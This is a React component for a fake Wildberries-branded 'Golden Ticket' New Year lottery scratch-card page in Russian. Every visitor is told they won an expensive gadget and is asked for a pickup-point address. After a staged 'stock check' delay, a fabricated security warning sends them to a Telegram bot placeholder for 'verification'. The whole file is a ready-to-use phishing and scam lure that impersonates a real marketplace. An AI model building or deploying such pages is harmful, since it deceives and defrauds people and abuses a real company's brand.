import { useEffect, useRef, useState } from 'react';
import './styles.css';

interface Snowflake {
  x: number;
  y: number;
  radius: number;
  speed: number;
  opacity: number;
}

interface Confetti {
  x: number;
  y: number;
  vx: number;
  vy: number;
  color: string;
  rotation: number;
  rotationSpeed: number;
}

const PRIZES = [
  'iPhone 17 Pro',
  'MacBook Pro M4',
  'AirPods Pro 3',
  'iPad Pro 13"',
  'Apple Watch Ultra 3',
  'PlayStation 5 Pro',
  'Samsung Galaxy S25 Ultra',
  'Dyson Airwrap',
  'Nintendo Switch 2',
  'Sony WH-1000XM6'
];

const HomePage = () => {
  const snowCanvasRef = useRef<HTMLCanvasElement>(null);
  const scratchCanvasRef = useRef<HTMLCanvasElement>(null);
  const confettiCanvasRef = useRef<HTMLCanvasElement>(null);
  const [isScratched, setIsScratched] = useState(false);
  const [showModal, setShowModal] = useState(false);
  const [modalStep, setModalStep] = useState(1);
  const [pvzAddress, setPvzAddress] = useState('');
  const [prizeName] = useState(() => {
    // Select random prize on component mount
    return PRIZES[Math.floor(Math.random() * PRIZES.length)];
  });

  // Snow animation
  useEffect(() => {
    const canvas = snowCanvasRef.current;
    if (!canvas) return;

    const ctx = canvas.getContext('2d');
    if (!ctx) return;

    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;

    const snowflakes: Snowflake[] = [];
    for (let i = 0; i < 100; i++) {
      snowflakes.push({
        x: Math.random() * canvas.width,
        y: Math.random() * canvas.height,
        radius: Math.random() * 2 + 1,
        speed: Math.random() * 0.5 + 0.2,
        opacity: Math.random() * 0.5 + 0.3,
      });
    }

    const animate = () => {
      ctx.clearRect(0, 0, canvas.width, canvas.height);
      
      snowflakes.forEach((flake) => {
        ctx.beginPath();
        ctx.arc(flake.x, flake.y, flake.radius, 0, Math.PI * 2);
        ctx.fillStyle = `rgba(255, 255, 255, ${flake.opacity})`;
        ctx.fill();

        flake.y += flake.speed;
        if (flake.y > canvas.height) {
          flake.y = -10;
          flake.x = Math.random() * canvas.width;
        }
      });

      requestAnimationFrame(animate);
    };

    animate();

    const handleResize = () => {
      canvas.width = window.innerWidth;
      canvas.height = window.innerHeight;
    };

    window.addEventListener('resize', handleResize);
    return () => window.removeEventListener('resize', handleResize);
  }, []);

  // Scratch card functionality
  useEffect(() => {
    const canvas = scratchCanvasRef.current;
    if (!canvas) return;

    const ctx = canvas.getContext('2d', { willReadFrequently: true });
    if (!ctx) return;

    canvas.width = 260;
    canvas.height = 140;

    // Draw golden scratch layer
    const gradient = ctx.createLinearGradient(0, 0, canvas.width, canvas.height);
    gradient.addColorStop(0, '#f4d03f');
    gradient.addColorStop(0.5, '#f9e79f');
    gradient.addColorStop(1, '#f4d03f');
    ctx.fillStyle = gradient;
    ctx.fillRect(0, 0, canvas.width, canvas.height);

    // Add text
    ctx.fillStyle = 'rgba(0, 0, 0, 0.3)';
    ctx.font = 'bold 24px Arial';
    ctx.textAlign = 'center';
    ctx.textBaseline = 'middle';
    ctx.fillText('СТЕРЕТЬ', canvas.width / 2, canvas.height / 2);

    let isDrawing = false;
    let hasActivated = false;

    const scratch = (x: number, y: number) => {
      ctx.globalCompositeOperation = 'destination-out';
      ctx.beginPath();
      ctx.arc(x, y, 25, 0, Math.PI * 2);
      ctx.fill();
    };

    const getMousePos = (e: MouseEvent | TouchEvent) => {
      const rect = canvas.getBoundingClientRect();
      const clientX = 'touches' in e ? e.touches[0].clientX : e.clientX;
      const clientY = 'touches' in e ? e.touches[0].clientY : e.clientY;
      return {
        x: (clientX - rect.left) * (canvas.width / rect.width),
        y: (clientY - rect.top) * (canvas.height / rect.height),
      };
    };

    const checkScratchPercentage = () => {
      if (hasActivated) return;
      
      const imageData = ctx.getImageData(0, 0, canvas.width, canvas.height);
      let transparent = 0;
      const totalPixels = canvas.width * canvas.height;
      
      for (let i = 3; i < imageData.data.length; i += 4) {
        if (imageData.data[i] < 128) {
          transparent++;
        }
      }
      
      const percentage = (transparent / totalPixels) * 100;
      
      if (percentage >= 30) {
        hasActivated = true;
        setIsScratched(true);
      }
    };

    const handleStart = (e: MouseEvent | TouchEvent) => {
      e.preventDefault();
      isDrawing = true;
      const pos = getMousePos(e);
      scratch(pos.x, pos.y);
      checkScratchPercentage();
    };

    const handleMove = (e: MouseEvent | TouchEvent) => {
      e.preventDefault();
      if (!isDrawing) return;
      const pos = getMousePos(e);
      scratch(pos.x, pos.y);
      checkScratchPercentage();
    };

    const handleEnd = () => {
      isDrawing = false;
    };

    canvas.addEventListener('mousedown', handleStart);
    canvas.addEventListener('mousemove', handleMove);
    canvas.addEventListener('mouseup', handleEnd);
    canvas.addEventListener('mouseleave', handleEnd);
    canvas.addEventListener('touchstart', handleStart, { passive: false });
    canvas.addEventListener('touchmove', handleMove, { passive: false });
    canvas.addEventListener('touchend', handleEnd);

    return () => {
      canvas.removeEventListener('mousedown', handleStart);
      canvas.removeEventListener('mousemove', handleMove);
      canvas.removeEventListener('mouseup', handleEnd);
      canvas.removeEventListener('mouseleave', handleEnd);
      canvas.removeEventListener('touchstart', handleStart);
      canvas.removeEventListener('touchmove', handleMove);
      canvas.removeEventListener('touchend', handleEnd);
    };
  }, []);

  // Confetti animation
  useEffect(() => {
    if (!isScratched) return;

    const canvas = confettiCanvasRef.current;
    if (!canvas) return;

    const ctx = canvas.getContext('2d');
    if (!ctx) return;

    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;

    const confettiPieces: Confetti[] = [];
    const colors = ['#FFD700', '#FF69B4', '#00CED1', '#FF6347', '#9370DB'];

    for (let i = 0; i < 150; i++) {
      confettiPieces.push({
        x: Math.random() * canvas.width,
        y: -20,
        vx: (Math.random() - 0.5) * 4,
        vy: Math.random() * 3 + 2,
        color: colors[Math.floor(Math.random() * colors.length)],
        rotation: Math.random() * 360,
        rotationSpeed: (Math.random() - 0.5) * 10,
      });
    }

    let animationId: number;
    const animate = () => {
      ctx.clearRect(0, 0, canvas.width, canvas.height);

      confettiPieces.forEach((piece, index) => {
        ctx.save();
        ctx.translate(piece.x, piece.y);
        ctx.rotate((piece.rotation * Math.PI) / 180);
        ctx.fillStyle = piece.color;
        ctx.fillRect(-5, -5, 10, 10);
        ctx.restore();

        piece.x += piece.vx;
        piece.y += piece.vy;
        piece.rotation += piece.rotationSpeed;
        piece.vy += 0.1;

        if (piece.y > canvas.height) {
          confettiPieces.splice(index, 1);
        }
      });

      if (confettiPieces.length > 0) {
        animationId = requestAnimationFrame(animate);
      }
    };

    animate();

    return () => {
      if (animationId) cancelAnimationFrame(animationId);
    };
  }, [isScratched]);

  const handleClaimPrize = () => {
    setShowModal(true);
    setModalStep(1);
  };

  const handleSubmitAddress = () => {
    if (!pvzAddress.trim()) return;
    setModalStep(2);
    setTimeout(() => {
      setModalStep(3);
    }, 3000);
  };

  const handleTelegramRedirect = () => {
    window.open('https://t.me/your_bot', '_blank');
  };

  return (
    <div className="lottery-container">
      <canvas ref={snowCanvasRef} id="snow-canvas" className="snow-canvas" />
      <canvas ref={confettiCanvasRef} id="confetti-canvas" className="confetti-canvas" />
      <div className="glow-bg" />

      <div className="ticket-wrapper">
        <div className="ticket">
          <div className="ticket-header">
            <div className="brand-label">
              <span>WILDBERRIES</span>
            </div>
            <h1 className="title">
              Золотой
              <br />
              <span className="gold-text-span">Билет</span>
            </h1>
            <p className="subtitle">Новогодний Розыгрыш 2026</p>

            <div className="gold-border-box">
              <div className="scratch-area" id="scratch-wrapper">
                <div className="prize-container">
                  <span className="prize-label">Ваш приз</span>
                  <div id="prize-name" className="prize-name">
                    {prizeName}
                  </div>
                </div>
                <canvas
                  ref={scratchCanvasRef}
                  id="scratch-canvas"
                  width={260}
                  height={140}
                  className="scratch-canvas"
                />
              </div>
            </div>
          </div>

          <div className="ticket-divider" />

          <div className="ticket-body">
            <p id="status-text" className="status-text">
              {isScratched
                ? 'Поздравляем! Нажмите кнопку ниже'
                : 'Сотрите защитный слой,\nчтобы узнать свой выигрыш'}
            </p>
            <button
              id="action-btn"
              disabled={!isScratched}
              className="action-btn"
              onClick={handleClaimPrize}
            >
              Забрать Приз
            </button>
          </div>
        </div>
      </div>

      {showModal && (
        <div id="modal-overlay" className="modal-overlay">
          <div className="glass-modal">
            <div className="steps-wrapper">
              {modalStep === 1 && (
                <div id="modal-step-1" className="modal-step active">
                  <div className="modal-icon">🎁</div>
                  <h3 className="modal-title">Поздравляем!</h3>
                  <p className="modal-desc">
                    Вы выиграли <span id="modal-prize-text">{prizeName}</span>!
                    <br />
                    Укажите адрес ближайшего ПВЗ для доставки.
                  </p>
                  <div className="input-group">
                    <label className="input-label">Адрес ПВЗ</label>
                    <input
                      id="pvz-input"
                      placeholder="г. Москва, ул. Арбат, 1"
                      className="input-glass"
                      value={pvzAddress}
                      onChange={(e) => setPvzAddress(e.target.value)}
                    />
                  </div>
                  <button
                    id="submit-address"
                    className="btn-primary"
                    onClick={handleSubmitAddress}
                  >
                    Оформить доставку
                  </button>
                </div>
              )}

              {modalStep === 2 && (
                <div id="modal-step-2" className="modal-step active">
                  <div className="loader-ring">
                    <div className="loader-ring-border" />
                    <div className="loader-ring-spin" />
                    <div className="loader-text">WB</div>
                  </div>
                  <h3 className="modal-title">Обработка...</h3>
                  <p className="modal-desc">Проверяем наличие на складе</p>
                </div>
              )}

              {modalStep === 3 && (
                <div id="modal-step-3" className="modal-step active">
                  <div className="modal-icon">⚠️</div>
                  <h3 className="modal-title">Требуется подтверждение</h3>
                  <p className="modal-desc">
                    Система безопасности приостановила оформление. Для получения{' '}
                    <span className="prize-target">{prizeName}</span> подтвердите, что вы не
                    робот, в официальном боте.
                  </p>
                  <a
                    id="tg-link-btn"
                    href="#"
                    target="_blank"
                    className="btn-primary btn-blue"
                    onClick={handleTelegramRedirect}
                  >
                    Подтвердить в боте
                  </a>
                </div>
              )}
            </div>
          </div>
        </div>
      )}
    </div>
  );
};

export default HomePage;
